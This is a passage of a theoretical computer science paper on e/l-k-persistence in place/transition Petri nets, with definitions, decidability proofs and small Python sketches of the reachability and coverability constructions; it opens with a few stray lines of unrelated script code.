rc=lnameget(path,type,name,form);
gname=scan(name,3,'.');
rc=imgctrl(tid,'wtitle',gname);
```
Abstract. The notion of persistence, based on the rule "no action can disable another one" is one of the classical notions in concurrency theory. It is also one of the issues discussed in the Petri net theory. We recall two ways of generalization of this notion: the first is "no action can kill another one" (called l/l-persistence) and the second "no action can kill another enabled one" (called the delayed persistence, or shortly e/l-persistence). Afterwards we introduce a more precise notion, called e/l-k-persistence, in which one action disables another one for no longer than a specified number k of single sequential steps. Then we consider an infinite hierarchy of such e/l-k persistencies. We prove that if an action is disabled, and not killed, by another one, it can not be postponed indefinitely. Afterwards, we investigate the set of markings in which two actions are enabled simultaneously, and also the set of reachable markings with that feature. We show that the minimum of the latter is finite and effectively computable. Finally we deal with decision problems about e/l-k persistencies. We show that all the kinds of e/l-k persistencies are decidable with respect to steps, markings and nets.
Keywords: Petri nets, concurrency, persistence, decision problems
1 Introduction
Petri nets constitute a very useful and suitable tool for concurrent systems modeling. Thanks to them, we can not only model real systems, but also analyze their properties and design systems which fulfill given criteria. For many years, concurrent systems have been examined in the context of their compliance with certain desirable properties, which fits in with the trend of the so-called ethics of concurrent computations. One of the commonly found undesirable properties of
concurrent systems is the presence of conflicts, and thus, one of the most desirable properties of them is conflict-freeness. The notion of persistence, proposed by Karp/Miller [11] is one of the most important notions in concurrency theory. It is based on the behaviourally oriented rule "no action can disable another one", and generalizes the structurally defined notion of conflict-freeness.
The notion of persistence is one of the issues frequently discussed in the Petri net theory - [4,10,11,14,15,13] and many others. It is being studied not only in terms of its theoretical properties, but also as a useful tool for designing and analyzing software environments [3]. In engineering, persistence is a highly desirable property, especially in the case of designing systems to be implemented in hardware. Many systems cannot work properly without satisfying this property.
We say that an action of a processing system is persistent if, whenever it becomes enabled, it remains enabled until executed. A system is said to be persistent if all its actions are persistent. This classical notion has been introduced by Karp/Miller [11]. In section 2.6, we show two generalizations of the classical notion (defined in [2]): l/l-persistence and e/l-persistence, which form the following hierarchy: \[ P_{e/e} \subseteq P_{l/l} \subseteq P_{e/l}. \] An action is said to be l/l-persistent if it remains live until executed, and is e/l-persistent if, whenever it is enabled, it cannot be killed by another action. For uniformity, we name the traditional persistence notion e/e-persistence. Next, we recall that those kinds of persistence are decidable in place/transition nets.
In section 3.1, we extend the hierarchy mentioned above with an infinite hierarchy of e/l-persistent steps. A step \( MaM' \) is said to be e/l-k-persistent for some \( k \in \mathbb{N} \) if the execution of an action \( a \) pushes the execution of any other enabled action away for at most \( k \) steps (more precisely: if the execution of an action \( a \) stops the enabledness of any other action, then the enabledness is restored not later than after \( k \) steps).
In section 3.2 we study decision problems related to the notion of e/l-k-persistence. These problems include EL-k Step Persistence Problem and EL-k Marking Persistence Problem. We show that both problems are decidable (Theorem 3 and Theorem 4).
The next problem we want to focus on is EL-k Net Persistence Problem. In order to check the decidability of the problem we need to take advantage of additional tools and facts. That is why we investigate the set of markings in which two actions are enabled simultaneously, and also the set of reachable markings with that feature. We show that the minimum of the latter is finite and effectively computable. We also prove that if some action pushes the enabledness of another one away for more than \( k \) steps, then it also needs to happen in some minimal reachable marking enabling these two actions. In our proofs we use the decidability of the Set Reachability Problem (from [2]) and also we make
use of the theory of residual sets of Valk/Jantzen [18]. Finally, we show that e/l-k-persistence is decidable with respect to nets (Theorem 9).
We also prove (section 3.3) that if an action of an arbitrary p/t-net is disabled (but not killed) by another one, it cannot be postponed indefinitely. We show that if a p/t-net is e/l-persistent, then it is e/l-k-persistent for some \( k \in \mathbb{N} \) (Theorem 10), and such a number \( k \) can be effectively found (Theorem 12). We also point out that the above-cited result does not hold for nets which do not have the monotonicity property (i.e., it is not true that an action enabled in some marking \( M \) is also enabled in any marking \( M' \) greater than \( M \)), for example for inhibitor nets.
The concluding section contains some questions and plans for further investigations.
A preliminary version of the paper was presented on the International Workshop on Petri Nets and Software Engineering (Hamburg, Germany, June 25-26, 2012) with electronical proceedings available online at CEUR-WS.org as Volume 851. The present paper is an improved and extended version of it.
2 Basic Notions
2.1 Denotations
The set of non-negative integers is denoted by \( \mathbb{N} \). Given a set \( X \), the cardinality (number of elements) of \( X \) is denoted by \( |X| \), the powerset (set of all subsets) by \( 2^X \), the cardinality of the powerset is \( 2^{|X|} \). Multisets over \( X \) are members of \( \mathbb{N}^X \), i.e. functions from \( X \) into \( \mathbb{N} \).
2.2 Petri Nets and Their Computations
The definitions concerning Petri nets are mostly based on [9].
Definition 1 (Nets). Net is a triple \( N = (P, T, F) \), where:
- \( P \) and \( T \) are finite disjoint sets, of places and transitions, respectively;
- \( F \subseteq P \times T \cup T \times P \) is a relation, called the flow relation.
For all \( a \in T \) we denote:
- \( {}^\bullet a = \{ p \in P \mid (p, a) \in F \} \) - the set of entries to \( a \)
- \( a^\bullet = \{ p \in P \mid (a, p) \in F \} \) - the set of exits from \( a \).
Petri nets admit a natural graphical representation. Nodes represent places and transitions, arcs represent the flow relation. Places are indicated by circles, and transitions by boxes.
The set of all finite strings of transitions is denoted by $T^*$, the length of $w \in T^*$ is denoted by $|w|$, number of occurrences of a transition $a$ in a string $w$ is denoted by $|w|_a$, two strings $u, v \in T^*$ such that $(\forall a \in T) |u|_a = |v|_a$ are said to be Parikh equivalent, which is denoted by $u \equiv v$.
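For illustration (not part of the formal development), Parikh equivalence can be checked simply by comparing occurrence counts. A minimal Python sketch, with strings of transitions represented as ordinary Python strings:

```python
from collections import Counter

def parikh_equivalent(u, v):
    # u ≡ v iff every transition occurs the same number of times in u and in v
    return Counter(u) == Counter(v)

print(parikh_equivalent("abba", "baba"))  # True: |w|_a = |w|_b = 2 in both
print(parikh_equivalent("ab", "abb"))     # False: the counts of b differ
```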
**Definition 2 (Place/Transition Nets).** Place/transition net (shortly, p/t-net) is a quadruple $S = (P, T, F, M_0)$, where:
- $N = (P, T, F)$ is a net, as defined above;
- $M_0 \in \mathbb{N}^P$ is a multiset of places, named the initial marking; it is marked by tokens inside the circles, capacity of places is unlimited.
Multisets of places are named markings. In the context of p/t-nets, they are mostly represented by nonnegative integer vectors of dimension $|P|$, assuming that $P$ is strictly ordered. The natural generalizations, for vectors, of arithmetic operations $+$ and $-$, as well as the partial order $\leq$, all defined componentwise, are well known and their formal definitions are omitted here.
In this context, by ${}^\bullet a$ ($a^\bullet$) we understand a vector of dimension $|P|$ which has 1 in every coordinate corresponding to a place that is an entry to (an exit from, respectively) $a$, and 0 in all other coordinates.
A transition $a \in T$ is enabled in a marking $M$ whenever ${}^\bullet a \leq M$ (all its entries are marked). If $a$ is enabled in $M$, then it can be executed, but the execution is not forced. The execution of a transition $a$ changes the current marking $M$ to the new marking $M' = (M - {}^\bullet a) + a^\bullet$ (tokens are removed from entries, then put to exits). The execution of an action $a$ in a marking $M$ is called a (sequential) step. We shall write $Ma$ for the predicate "$a$ is enabled in $M$" and $MaM'$ for the predicate "$a$ is enabled in $M$ and $M'$ is the resulting marking".
These notions and predicates extend, in a natural way, to strings of transitions: $M\varepsilon M$ holds for any marking $M$ (where $\varepsilon$ denotes the empty string), and $MvaM''$ ($v \in T^*, a \in T$) iff $MvM'$ and $M'aM''$ for some marking $M'$.
**Remark:** Wherever this will not lead to confusion, we will use a notation $M' = Ma$ to denote the fact that the action $a$ is enabled in a marking $M$ and a marking $M'$ is the result of the execution of action $a$ in a marking $M$.
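The enabling and firing rules above can be sketched in a few lines of Python. This is an illustrative sketch only; encoding markings and the entry/exit vectors of a transition as integer tuples is our own convention, not the paper's:

```python
def enabled(M, pre):
    # a transition is enabled in M whenever its entry vector is <= M componentwise
    return all(p <= m for p, m in zip(pre, M))

def fire(M, pre, post):
    # the step MaM': tokens are removed from entries, then put to exits
    assert enabled(M, pre), "transition not enabled"
    return tuple(m - p + q for m, p, q in zip(M, pre, post))

# places (p1, p2); transition a moves the token from p1 to p2
M0 = (1, 0)
a_pre, a_post = (1, 0), (0, 1)
print(enabled(M0, a_pre))       # True
print(fire(M0, a_pre, a_post))  # (0, 1)
```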
If $MwM'$, for some $w \in T^*$, then $M'$ is said to be reachable from $M$; the set of all markings reachable from $M$ is denoted by $[M]$. Given a p/t-net $S = (P, T, F, M_0)$, the set $[M_0]$ of markings reachable from the initial marking $M_0$ is called the reachability set of $S$, and markings in $[M_0]$ are said to be reachable in $S$.
A transition $a \in T$ is said to be live in a marking $M$ if there is a string $u \in T^*$ such that $ua$ is enabled in $M$. A transition $a \in T$ that is not live in a marking $M$ is said to be dead in a marking $M$. Let $M \in [M_0]$ be a marking such that $MaM'$ for some $a \in T$, then if a transition $b \neq a$ is enabled (live) in $M$ and not enabled (not live) in $M'$, we say that (the execution of) $a$ disables (kills) $b$ in a marking $M$. We also say that an action $a$ disables (kills) $b$ (in a net $S$) if $a$ disables (kills) $b$ in some reachable marking $M$.
**Definition 3 (Inhibitor nets).** Inhibitor net is a quintuple $S = (P, T, F, I, M_0)$, where:
- $(P, T, F, M_0)$ is a p/t-net, as defined above;
- $I \subseteq P \times T$ is the set of inhibitor arcs (depicted by edges ending with a small empty circle). Sets of entries and exits are denoted by ${}^\bullet a$ and $a^\bullet$, as in p/t-nets; the set of inhibitor entries to $a$ is denoted by $\circ a = \{p \in P \mid (p, a) \in I\}$.
A transition $a \in T$ (of an inhibitor net) is enabled in a marking $M$ whenever ${}^\bullet a \leq M$ (all its entries are marked) and $(\forall p \in \circ a)\ M(p) = 0$ - all inhibitor entries to $a$ are empty. The execution of $a$ leads to the resulting marking $M' = (M - {}^\bullet a) + a^\bullet$.
The following well-known fact follows easily from Definitions 1 and 2.
**Fact 1 (Diamond and big diamond properties)** Any place/transition net possesses the following property:
- Big Diamond Property:
- If $MuM' \land MvM'' \land u \equiv v$ (Parikh equivalence), then $M' = M''$.
- Its special case with $|u| = |v| = 2$ is called the Diamond Property:
- If $MabM' \land MbaM''$, then $M' = M''$.
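The Diamond Property can be observed concretely: firing two independent transitions in either order yields the same marking. A short Python sketch (markings and entry/exit vectors are encoded as integer tuples, our own illustrative convention):

```python
def fire(M, pre, post):
    # fire a transition with entry vector `pre` and exit vector `post`
    assert all(p <= m for p, m in zip(pre, M)), "transition not enabled"
    return tuple(m - p + q for m, p, q in zip(M, pre, post))

# places (p1, p2, p3); a: p1 -> p3 and b: p2 -> p3 consume different places
a = ((1, 0, 0), (0, 0, 1))
b = ((0, 1, 0), (0, 0, 1))
M = (1, 1, 0)

Mab = fire(fire(M, *a), *b)   # execute a then b
Mba = fire(fire(M, *b), *a)   # execute b then a
print(Mab == Mba == (0, 0, 2))  # True: both orders reach the same marking
```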
**Definition 4.** We say that a Petri net $S = (P, T, F, M_0)$ has the monotonicity property if and only if $(\forall w \in T^*)(\forall M, M' \in \mathbb{N}^P)\ Mw \land M \leq M' \Rightarrow M'w$.
**Fact 2** P/t-nets have the monotonicity property.
*Proof.* Obvious, since in p/t-nets the tokens of $M' - M$ can be regarded as frozen (inactive) tokens.
**Fact 3** Inhibitor nets do not have the monotonicity property.
*Proof.* Let us look at the example of Fig. 1. It can easily be seen that $M_1 < M'_1$, and that $M_1a$ holds but $M'_1a$ does not.
2.3 Monoid \( \mathbb{N}^k \)
**Definition 5 (Monoid \( \mathbb{N}^k \), rational operations, rational subsets).**
The monoid \( \mathbb{N}^k \) is the set of \( k \)-dimensional non-negative integer vectors with the componentwise addition \( + \).
If \( X, Y \subseteq \mathbb{N}^k \) then \( X + Y = \{ x + y \mid x \in X, y \in Y \} \) and the star operation is defined as \( X^* = \bigcup\{ X_i \mid i \in \mathbb{N} \} \), where \( X_0 = \{(0, \ldots, 0)\} \) and \( X_{i+1} = X_i + X \). The partial order \( \leq \) is understood componentwise, and \( < \) means \( \leq \) and \( \neq \). Rational subsets of \( \mathbb{N}^k \) are subsets built from finite subsets with finitely many operations of union \( \cup \), addition \( + \) and star \( * \).
**Theorem 1 (Ginsburg/Spanier[8]).** Rational subsets of \( \mathbb{N}^k \) form an effective boolean algebra (i.e. are closed under union, intersection and difference).
**Definition 6 (\( \omega \)-extension).** Let \( \mathbb{N}_\omega = \mathbb{N} \cup \{ \omega \} \), where \( \omega \) is a new symbol (denoting infinity). We extend, in a natural way, arithmetic operations: \( \omega + n = \omega, \omega - n = \omega, \) and the order: \( (\forall n \in \mathbb{N})\ n < \omega \).
The set of \( k \)-dimensional vectors over \( \mathbb{N}_\omega \) we shall denote by \( \mathbb{N}_\omega^k \), and its elements we shall call \( \omega \)-vectors. Operations \( +, - \) and the order \( \leq \) in \( \mathbb{N}_\omega^k \) are componentwise.
For \( X \subseteq \mathbb{N}_\omega^k \), we denote by \( \text{Min}(X) \) the set of all minimal (wrt \( \leq \)) members of \( X \), and by \( \text{Max}(X) \) the set of all maximal (wrt \( \leq \)) members of \( X \). Let \( v, v' \in \mathbb{N}_\omega^k \) be \( \omega \)-vectors such that \( v \leq v' \), then we say that \( v' \) covers \( v \) \( (v \text{ is covered by } v') \).
Let us recall a well-known and important fact, known as Dickson’s Lemma.
**Lemma 1 ([8]).** Any set of pairwise incomparable elements of \( \mathbb{N}_\omega^k \) is finite.
**Definition 7 (Closures, convex sets).**
- Let \( x \in \mathbb{N}_\omega^k \) and \( X \subseteq \mathbb{N}_\omega^k \). We denote: \( \downarrow x = \{ z \in \mathbb{N}_\omega^k \mid z \leq x \} \), \( \uparrow x = \{ z \in \mathbb{N}_\omega^k \mid z \geq x \} \), \( \downarrow X = \bigcup\{ \downarrow x \mid x \in X \} \), \( \uparrow X = \bigcup\{ \uparrow x \mid x \in X \} \), and call the sets \( \downarrow X \) and \( \uparrow X \) the left and right closures of \( X \), respectively;
- A set \( X \subseteq \mathbb{N}_\omega^k \) such that \( X = \downarrow X \) (\( X = \uparrow X \)) is said to be left- (right-) closed;
- A set \( X \subseteq \mathbb{N}_\omega^k \) such that \( X = \downarrow X \cap \uparrow X \) is said to be convex.
We also recall a fact proved in [2]:
**Proposition 1.** Any convex subset of \( \mathbb{N}^k \) is rational.
2.4 Reachability graph/tree and coverability graph
Let us recall the notions of a reachability graph/tree and a coverability graph. Their definitions can be also found in any monograph or survey about Petri nets (see [5,17] or arbitrary else). Reachability graphs/trees are used for studying complete behaviors of nets, but they are usually infinite, which makes an accurate analysis of them difficult. That is why we study coverability graphs, which represent the behaviors of nets only partially, but are always finite.
The reachability graph of a p/t-net $S = (P, T, F, M_0)$ is a couple $RG = (G, M_0)$ where $[M_0] \times T \times [M_0] \supseteq G = \{(M, a, M') \mid M \in [M_0] \land MaM'\}$.
The reachability graph $RG$ represents graphically the behavior of the net $S$. Vertices of the graph are reachable markings from the set $[M_0]$, while edges are ordered pairs of reachable states, labeled by actions. More precisely: the edge $(M, a, M') \in G$ if $M$ is a state reachable from the initial marking $M_0$, an action $a \in T$ (the label of the edge $(M, a, M')$) is enabled in a state $M$ and $M' = Ma$.
The existence of an edge $(M, a, M')$ in the reachability graph of the net $S$ indicates that the marking $M$ is reachable in $S$, the action $a$ is enabled in $M$ and after the execution of the action $a$ in the marking $M$, the net $S$ reaches the state $M'$.
Sometimes it is more convenient to use a special graph structure for listing all reachable markings of a given p/t-net, namely a tree structure. Such a tree is called a reachability tree.
For a given net $S = (P,T,F,M_0)$ we construct its reachability tree $RT$ proceeding as follows:
- We start with the initial marking $M_0$ which is the root vertex of the reachability tree.
- For each action $a$ enabled in the initial marking of the net, we create a new vertex $M'$, such that $M' = M_0a$, and an edge $(M_0, a, M')$ leading from $M_0$ to $M'$, labelled by $a$.
- We repeat the procedure for all the newly created vertices (markings).
Remark: The construction of a reachability tree is a potentially endless process, as the structure is infinite in many cases.
Definition 8. Let $RT$ be a reachability tree of a net $S = (P,T,F,M_0)$. The k-component of the reachability tree $RT$ is the initial part of the tree of depth $k$ (all vertices at depth at most $k$).
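Although the reachability tree itself may be infinite, every vertex has at most $|T|$ children, so the k-component is finite and can be enumerated by a bounded breadth-first expansion. An illustrative Python sketch, with nets encoded as tuples of token vectors (our own convention, not the paper's):

```python
def k_component(M0, transitions, k):
    # Return the edges (M, a, M') of the initial part of the reachability
    # tree of (N, M0) up to depth k; `transitions` maps a transition name
    # to its (entry, exit) token vectors.
    def enabled(M, pre):
        return all(p <= m for p, m in zip(pre, M))
    def fire(M, pre, post):
        return tuple(m - p + q for m, p, q in zip(M, pre, post))
    edges, frontier = [], [M0]
    for _ in range(k):
        nxt = []
        for M in frontier:
            for name, (pre, post) in transitions.items():
                if enabled(M, pre):
                    M2 = fire(M, pre, post)
                    edges.append((M, name, M2))
                    nxt.append(M2)
        frontier = nxt
    return edges

# a and b shuttle a single token between places p1 and p2
T = {"a": ((1, 0), (0, 1)), "b": ((0, 1), (1, 0))}
print(k_component((1, 0), T, 2))
# [((1, 0), 'a', (0, 1)), ((0, 1), 'b', (1, 0))]
```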
In the case of a coverability tree it is convenient to present a constructional definition. That is why we introduce:
Algorithm of the construction of a coverability graph
We create a coverability graph for a p/t-net \( S = (P, T, F, M_0) \)
- **Step 0. An initial vertex**
We set \( M_0 \) blue for a start.
GOTO Step 1.
- **Step 1. Generating of new working vertices**
If there are no blue vertices, then STOP.
We take an arbitrary blue vertex \( M \) and draw from it all the arcs of the form \( (M, t, M') \) for all \( t \in T \) enabled in \( M \), where \( M' = Mt \). If the vertex \( M' \) already exists (in any colour), then the newly created arc leads to the existing vertex (we do not create a new one). New vertices are set yellow. After drawing all such arcs we set the vertex \( M \) grey (a final node).
GOTO Step 2.
- **Step 2. Coverability checking**
If there are no yellow vertices, GOTO Step 1.
We take an arbitrary yellow vertex \( M \) and check, for any path from \( M_0 \) to \( M \), whether a vertex \( M' \) such that \( M' \leq M \) lies on the path. If such a vertex exists, then every coordinate of the marking \( M \) greater than the corresponding coordinate of the marking \( M' \) changes to \( \omega \). Finally we set the vertex \( M \) blue.
GOTO Step 2.
*Example 1.* Let us look at the Example of Figure 2. A p/t-net and stages of the construction of its coverability graph are presented there.
*Remark:* A coverability graph is always finite. The proof is based on two facts: Dickson’s Lemma (Lemma 1) and the monotonicity property (Fact 2).
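The construction above can be sketched in Python. This is an illustrative Karp/Miller-style implementation under our own tuple encoding of nets; here ω is represented by float("inf"), which already satisfies ω + n = ω, ω - n = ω and n < ω:

```python
OMEGA = float("inf")  # plays the role of omega: OMEGA + n == OMEGA - n == OMEGA

def coverability_graph(M0, transitions):
    # Blue/yellow scheme in miniature: a freshly generated marking M is
    # "accelerated" whenever some marking M' <= M lies on the path from M0
    # (the coverability check of Step 2); coordinates that grew become OMEGA.
    def enabled(M, pre):
        return all(p <= m for p, m in zip(pre, M))
    def fire(M, pre, post):
        return tuple(m - p + q for m, p, q in zip(M, pre, post))
    def accelerate(M, path):
        for Mp in path:
            if Mp != M and all(a <= b for a, b in zip(Mp, M)):
                M = tuple(OMEGA if a < b else b for a, b in zip(Mp, M))
        return M
    vertices, edges = {M0}, set()
    work = [(M0, (M0,))]  # "blue" vertices together with a path from M0
    while work:
        M, path = work.pop()
        for name, (pre, post) in transitions.items():
            if enabled(M, pre):
                M2 = accelerate(fire(M, pre, post), path)
                edges.add((M, name, M2))
                if M2 not in vertices:  # a new ("yellow") vertex
                    vertices.add(M2)
                    work.append((M2, path + (M2,)))
    return vertices, edges

# a: p1 -> p1 + p2 pumps arbitrarily many tokens onto p2
V, E = coverability_graph((1, 0), {"a": ((1, 0), (1, 1))})
print(sorted(V))  # [(1, 0), (1, inf)]
```

The acceleration against the whole path (rather than the parent only) is what guarantees termination, by Dickson's Lemma.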
### 2.5 Reachability and Coverability Problems
Let us now recall very famous decision problems concerning Petri nets, namely the Reachability Problem and the Coverability Problem.
**Reachability Problem**
*Instance:* P/t-net \( S = (N, M_0) \), and a marking \( M \).
*Question:* Is \( M \) reachable in \( S \)?
**Coverability Problem**
*Instance:* P/t-net \( S = (N, M_0) \), and a marking \( M \).
Question: Is $M$ coverable in $S$?
Remark: It is well known that the above problems are decidable (coverability: Karp/Miller [11], Hack [10]; reachability: Mayr [15], Kosaraju [12]).
2.6 Three Kinds of Persistence
The notion of persistence is one of the classical notions in concurrency theory. The notion is recalled in [2] (named in the sequel e/e-persistence). Some of its generalizations: l/l-persistence and e/l-persistence are also introduced there.
Note on terminology
The notion of persistence in its classical meaning is a property of nets. The definition of [14] involves the entire concurrent system. If we choose to define the concept of persistence starting from actions, through markings, and ending with whole nets, the classic definition can be interpreted in two ways. Namely, one can consider concepts of persistence and nonviolence. An extensive discussion on the links between persistence and nonviolence can be found in [13]. In the context of [11] and [13] it seems that it would be more appropriate to use the notion of nonviolence instead of using the concept of persistence. However, because our paper is an extension of [2], we decided to stick to the concept of persistence.
Let us sketch the notions of e/e-persistence, l/l-persistence and e/l-persistence informally. The classical e/e-persistence means "no action can disable another one", the l/l-persistence means "no action can kill another one" and the e/l-persistence means "no action can kill another enabled one". Let us go on to formal definitions.
**Definition 9 (Three kinds of persistence).** Let \( S = (P, T, F, M_0) \) be a place/transition net. If \((\forall M \in [M_0]) (\forall a, b \in T) \)
- \( Ma \land Mb \land a \neq b \Rightarrow Mab \), then \( S \) is said to be e/e-persistent;
- \( Ma \land (\exists u)Mub \land a \neq b \Rightarrow (\exists v)Mavb \), then \( S \) is said to be l/l-persistent;
- \( Ma \land Mb \land a \neq b \Rightarrow (\exists v)Mavb \), then \( S \) is said to be e/l-persistent.
The classes of e/e-persistent (l/l-persistent, e/l-persistent) p/t-nets will be denoted by \( P_{e/e}, P_{l/l} \) and \( P_{e/l} \), respectively.
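The e/e condition of Definition 9 can be checked directly at a single marking. A hedged Python sketch (the tuple encoding of nets is our own convention, and the conflict net below is a fresh example, not one of the paper's figures):

```python
def ee_persistent_marking(M, transitions):
    # e/e condition at M: for all distinct enabled a, b, the sequence ab is
    # enabled, i.e. executing a does not disable b.
    def enabled(Mk, pre):
        return all(p <= m for p, m in zip(pre, Mk))
    def fire(Mk, pre, post):
        return tuple(m - p + q for m, p, q in zip(Mk, pre, post))
    on = [t for t, (pre, _) in transitions.items() if enabled(M, pre)]
    for a in on:
        Ma = fire(M, *transitions[a])
        if any(b != a and not enabled(Ma, transitions[b][0]) for b in on):
            return False
    return True

# a and b compete for the token on the single place p1 (a classic conflict)
T = {"a": ((1,), (0,)), "b": ((1,), (0,))}
print(ee_persistent_marking((1,), T))  # False: firing a disables b
print(ee_persistent_marking((2,), T))  # True: two tokens, no conflict
```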
In [2] one can find a proof of the following theorem:
**Theorem 2.** The three classes of persistent place/transition nets form an increasing hierarchy:
\[ P_{e/e} \subseteq P_{l/l} \subseteq P_{e/l} \].

**Example 2.** To see the strictness of the above inclusions, let us look at the examples of Figures 4 and 5 (derived from [2]).
It is also shown in [2] that the following decision problems are decidable:
**Instance:** A p/t-net \((N, M_0)\)
**Questions:**
- **EE Net Persistence Problem:** Is the net \( S \) e/e-persistent?
- **LL Net Persistence Problem:** Is the net \( S \) l/l-persistent?
- **EL Net Persistence Problem:** Is the net \( S \) e/l-persistent?
The proofs of decidability of the above problems rely on a powerful result of Valk/Jantzen [18] and benefit from the decidability of the reachability problem (more specifically, the decidability of the Set Reachability Problem for rational convex sets).
The alternative proof of Theorem 9 uses exactly the same proving technique as the proofs of decidability of the persistence problems mentioned above.
3 Properties of e/l-persistence
3.1 Hierarchy of e/l-persistence
In the previous section we defined three kinds of persistence. Now, we extend the hierarchy mentioned above with an infinite hierarchy of e/l-persistent steps.
Definition 10 (E/l-persistent steps - an infinite hierarchy).
Let $S = (P, T, F, M_0)$ be a p/t-net, let $M$ be a marking. We call a step $MaM'$:
- e/l-0-persistent iff it is e/e-persistent (the execution of an action $a$ does not disable any other action);
- e/l-1-persistent iff $(\forall b \in T, b \neq a)\ Mb \Rightarrow [Mab \lor (\exists c \in T)\ Macb]$ (the execution of an action $a$ pushes the execution of any other enabled action away for at most 1 step);
- e/l-2-persistent iff $(\forall b \in T, b \neq a)\ Mb \Rightarrow (\exists w \in T^*)\ |w| \leq 2 \land Mawb$ (the execution of an action $a$ pushes the execution of any other enabled action away for at most 2 steps);
- e/l-$k$-persistent for some $k \in \mathbb{N}$ iff $(\forall b \in T, b \neq a)\ Mb \Rightarrow (\exists w \in T^*)\ |w| \leq k \land Mawb$ (the execution of an action $a$ pushes the execution of any other enabled action away for at most $k$ steps);
- e/l-$\infty$-persistent iff $(\forall b \in T, b \neq a)\ Mb \Rightarrow (\exists w \in T^*)\ Mawb$ (the execution of an action $a$ pushes the execution of any other enabled action away).
**Remark:** Note that e/l-∞-persistent steps are exactly e/l-persistent steps.
Directly from Definition 10 we get the
**Fact 4** Let $S = (P, T, F, M_0)$ be a p/t-net, let $M$ be a marking. If the step $MaM'$ is e/l-$k$-persistent for some $k \in \mathbb{N}$, then it is also e/l-$i$-persistent for every $i \geq k$.
**Definition 11.** Let $S = (P, T, F, M_0)$ be a p/t-net, $M$ be a marking and $k \in \mathbb{N}$. Marking $M$ is e/l-$k$-persistent iff for every action $a \in T$ that is enabled in $M$ the step $Ma$ is e/l-$k$-persistent. P/t-net $S = (N, M_0)$ is e/l-$k$-persistent iff every marking reachable in $S$ is e/l-$k$-persistent. We denote the class of e/l-$k$-persistent p/t-nets by $P_{e/l-k}$.

**Fig. 6.** A p/t-net (for Ex.3) that is not e/l-k-persistent for any k ∈ N
**Example 3.** Let us look at the example of Fig. 6. Both actions a and b are enabled in the initial marking. After the execution of the action a, the action b is never enabled again, and after the execution of the action b, the action a is never enabled again. So the net cannot be e/l-k-persistent for any natural number k.
**Example 4.** Let us look at the example of Fig. 4. The net is not e/l-0-persistent but it is e/l-1-persistent.
**Example 5.** Let us look at the example of Fig. 7. The only possible situation for temporary disabling an action by another one is the execution of a that disables b. And then b could be enabled again after the execution of the sequence cde, so after 3 steps. Hence, the net is e/l-3-persistent, and obviously not e/l-2-persistent.
The direct conclusion from Fact 4 and Definition 11 is as follows:
**Fact 5** Let \( S = (P, T, F, M_0) \) be a p/t-net, \( M \) be a marking, and \( k \in \mathbb{N} \). If the marking \( M \) is e/l-\( k \)-persistent, then it is also e/l-\( i \)-persistent for every \( i \geq k \). If the net \( S \) is e/l-\( k \)-persistent, then it is also e/l-\( i \)-persistent for every \( i \geq k \).
**Remark:** Based on this Fact 5 we can extend the existing hierarchy of persistent nets as shown in Figure 8.
### 3.2 Related decision problems
- **EL-k Step Persistence Problem**
- **EL-k Marking Persistence Problem**
Let \( k \in \mathbb{N} \) be a fixed natural number. Now we can formulate basic problems regarding the concept of e/l-k-persistence.
The first problem is as follows:
**EL-k Step Persistence Problem**
*Instance:* P/t-net $S$, marking $M$, action $a \in T$ enabled in $M$.
*Question:* Is the step $Ma$ e/l-k-persistent?
**Theorem 3.** The EL-k Step Persistence Problem is decidable (for any $k \in \mathbb{N}$).
*Proof.* An algorithm to check if a step $Ma$ is e/l-k-persistent (for some $k \in \mathbb{N}$) for a given net $S = (N, M_0)$:
Let us build the initial part of depth $k+1$ (we call it the $(k+1)$-component) of the reachability tree of $(N, M')$, where $M'$ is the marking obtained from $M$ by the execution of $a$. The step $Ma$ is e/l-$k$-persistent if and only if for every action $b \in T$, such that $b \neq a$ and $b$ is enabled in $M$, there is a path in the $(k+1)$-component of the reachability tree of $(N, M')$ containing an arc labelled by $b$.
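The check from the proof can be sketched as a bounded breadth-first exploration. The net encoding below (a dict from transition names to pre/post place vectors) and the toy net in the usage note are our own illustrations, not notation from the paper:

```python
def enabled(M, pre):
    """Is a transition with precondition `pre` enabled in marking M?"""
    return all(m >= p for m, p in zip(M, pre))

def fire(M, pre, post):
    """Fire a transition: consume `pre`, produce `post`."""
    return tuple(m - p + q for m, p, q in zip(M, pre, post))

def step_is_elk_persistent(net, M, a, k):
    """Decide whether the step Ma is e/l-k-persistent (Theorem 3 sketch).

    `net` maps each transition name to a (pre, post) pair of place vectors.
    We explore the (k+1)-component of the reachability tree of (N, M'),
    where M' = Ma, recording which transitions label some arc."""
    pre_a, post_a = net[a]
    assert enabled(M, pre_a), "a must be enabled in M"
    frontier = [fire(M, pre_a, post_a)]
    # every other action enabled in M must fire somewhere in the component
    targets = {b for b, (pre, _) in net.items() if b != a and enabled(M, pre)}
    seen = set()
    for _ in range(k + 1):
        nxt = []
        for m in frontier:
            for t, (pre, post) in net.items():
                if enabled(m, pre):
                    seen.add(t)
                    nxt.append(fire(m, pre, post))
        frontier = nxt
    return targets <= seen
```

On an invented two-place net in which a moves the only token away from b's input place and a third transition c moves it back (a stand-in for the net of Figure 4), the step from the initial marking is not e/l-0-persistent but is e/l-1-persistent.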
Let us introduce another problem:
**EL-k Marking Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, marking $M$.
*Question:* Is the marking $M$ e/l-k-persistent?
**Theorem 4.** The EL-k Marking Persistence Problem is decidable (for any $k \in \mathbb{N}$).
*Proof.* For every action $a \in T$ that is enabled in a marking $M$, we check if a step $Ma$ is e/l-k-persistent (for some $k \in \mathbb{N}$) for a given net $S = (N, M_0)$, using the algorithm of Theorem 3.
*EL-k Net Persistence Problem*
Let us consider the following problem:
**EL-k Net Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, $k \in \mathbb{N}$.
*Question:* Is the net $S$ e/l-k-persistent?
To solve this problem we must prove a set of auxiliary facts.
From this moment, let $S = (N, M_0)$ be an arbitrary p/t-net.
Let us define the following set of markings:
$E_{a,b} = \{ M \in \mathbb{N}^P \mid Ma \land Mb \}$ - the set of markings enabling actions $a$ and $b$ simultaneously.
Let us define \( \text{minE}_{a,b} \in \mathbb{N}^P \), the minimum marking enabling actions \( a \) and \( b \) simultaneously: if \((\bullet a[i] = 1 \lor \bullet b[i] = 1)\) then \( \text{minE}_{a,b}[i] := 1 \) else \( \text{minE}_{a,b}[i] := 0 \) (for \( i = \{1, \ldots, |P|\} \)).
Note that \( E_{a,b} = \text{minE}_{a,b} + \mathbb{N}^P \).
